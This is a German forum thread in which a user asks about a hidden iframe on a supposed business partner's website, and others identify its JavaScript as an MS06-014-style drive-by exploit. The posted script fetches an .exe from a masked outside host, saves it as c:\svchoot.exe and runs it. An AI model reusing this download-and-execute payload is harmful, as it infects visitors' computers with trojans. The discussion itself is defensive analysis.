Was bedeutet dieser Code ? Danke...

[cosmocramer]

hallo.

heute hat unsere fima ´ne email mit persönlicher anrede an gf und einkäufer bekommen, und unter anderem mit einem link zur webseite des "zukünftigen" geschäftspartners.
im quelltext dieser seite befindet sich aber interessanterweise

<iframe src="http://www.xxxx.com/kg/wm.htm" width=0 height=0></iframe>

der link

http://www.jswelt.de

zu dieser seite [aber nur ohne gewähr ]


Ist dies problematisch ?

ich danke euch....
bye , cosmo

EDIT :

untenstehender code ist der quellcode des oben genannten i-frames...
gibt es nen tipp über die wirkung dieses skriptes ?

danke

<html><head>
<script language="Javascript">
function do1(mx,as,p)
{
	p.Type = 1;
	p.Write(mx.responseBody);
	p.SaveToFile(as,2);
	p.Open();
	p.Close();
	as.Send();
}
var a = null;
var mx,as,p;
p = "c:\\svchoot.exe"
a = (document.createElement("div"));
a.setAttribute("classid","clsid:CD97C536-62A3-1AD0-986A-00C07FC29E36");
try{mx = a.CreateObject("Microsoft.Word","");
if(!mx)mx = new ActiveXClass("Microsoft.Excel");
as = a.CreateNode("Vista.Stream","");}catch(e){};
if(as){
	mx.Open("GET","http://www.xxxx.com/mc/kg.exe",0);
	do1(mx,as,p);
	var r;
	try{r = a.CreateObject("Word.Application","");}catch(e){};
	if(r)
	{
		r.ShellExecute(p,"","","open",0);
	}else
	{
		try{r = a.CreateObject("Perl.Shell","");}catch(e){};
		if(r)r.Run(p,0);
	}
}

</script>
</head>
<body>

 

[Albu]

Wenn man diese Seite ungeschützt aufruft (also z.B. mit dem Internet Explodierer), dann kann man danach seinen Rechner entwanzen.

Also Finger wech davon!

 

[cosmocramer]

und das script selber, lädt es "nur" die *.exe auf den rechner ?

welche gefahren verbergen sich hier noch ?

danke

 

[pit-r]

Moin!

FrSIRT Virus Alerts - JS_WONKA.AS

Ahoi - Pit

 

[Albu]

und das script selber, lädt es "nur" die *.exe auf den rechner ?

welche gefahren verbergen sich hier noch ?

Es wird geladen und ausgeführt. Der ausgeführte Teil dürfte dann weitere Parts aus dem Internet nachladen und sich in der Registry festsetzen.
Entsprechende URLs und Programmaufrufe finden sich in der .exe.

@pit-r: Der Link dürfte nicht der korrekte sein, ich habe ein paar Modifkationen am Script vorgenommen, um es den Copycats nicht zu einfach zu machen

Hier eine Seite von Trendmicro mit Infos:
Trend Micro - Sicherheitsinformationen: TROJ_DELF.ERZ

 

[pit-r]

@pit-r: Der Link dürfte nicht der korrekte sein...

Ich hatte den Originalcode mit ein paar kleinen Modifikationen ausgeführt und XP meldete den 'JS/MS06-014!exploit'...

 

[ein schlauer]

du bist ja mutig

 

[pit-r]

Nicht wirklich - hab den Code ja entschärft.

 

[ein schlauer]

ich dachte schon - ist ja ein netter Zeitvertreib, wenn man mal 'n Nachmittag nichts zu tun hat, Windows neu installieren

 

[cosmocramer]

ich hoffe, es war kein problem, das ich den code und die links hier gepostet habe...wenn doch, dann SORRY...

danke für eure hilfe.

bye, cosmo

 

[Albu]

Ich hatte den Originalcode mit ein paar kleinen Modifikationen ausgeführt und XP meldete den 'JS/MS06-014!exploit'...

Na gut, dann liegts vermutlich daran, dass sich die AnitVirenHersteller nicht einigen können, wie denn so ein neues Viech zu benamsen ist, und es deshalb für jedes Ding 5 verschiedene Namen gibt.

Wobei der oben genannte Exploit ja dazu verwendet werden kann beliebigen Schadcode zu verteilen. Mein Link bezog sich auf die .exe, die ich mir mal angeschaut habe (ohne den konkreten Seitenquelltext auszuführen).

 

[cosmocramer]

achja, was denkt ihr, ist der iframe "zufällig", also per cracking in den quelltext geraten oder absichtlich platziert worden [vom seitenbetreiber]?

interessant deshalb, weil die email ja persönlich den gf und den ek ansprach und das produktportfolio dort auch recht interessant ist für unsere firma...

danke

 

[Albu]

es ist schwer zu sagen, ob die Seite gehackt wurde, mögliche Gründe für einen Hack wären:
- der IFrame ist nur auf der Startseite
- die Startseite ist anders als alle anderen Seiten (die restlichen sind mit Dreamweaver Templates gemacht, haben ein völlig anderes Design)
- die Seite benutzt ASP zum Login, ein potentielles Einfallstor
- ASP läuftz i.d.R. auf Windows Servern, ein weiteres Einfallstor
- der IFame ist ganz am Ende der Seite, hinter dem </html> Tag, als wäre es nur angehängt

Andererseits könnte dies auch ein Versuch von Industriespionage sein, indem gezielt potentielle Interessenten ermittelt und angesprochen werden, um sie auf eine präparierte Seite zu locken und mittels des Trojaners dann Firmengeheimnisse auszuspionieren.

Ich würde die mal anschreiben und auf den Virus/Trojaner hinweisen. Entweder verschwindet der IFrame dann schleunigst oder eben nicht.
Wenn der Laden seriös ist, dann ist der IFrame schnell weg....

 

[cosmocramer]

also, ich hab denen jetzt mal ne email geschickt mit hinweis auf den iframe,
und das dieser nicht irgendwo in ner menge überflüssiger quelltext versteckt ist, ist verwunderlich.

aber naja, wir werden sehen.

danke schön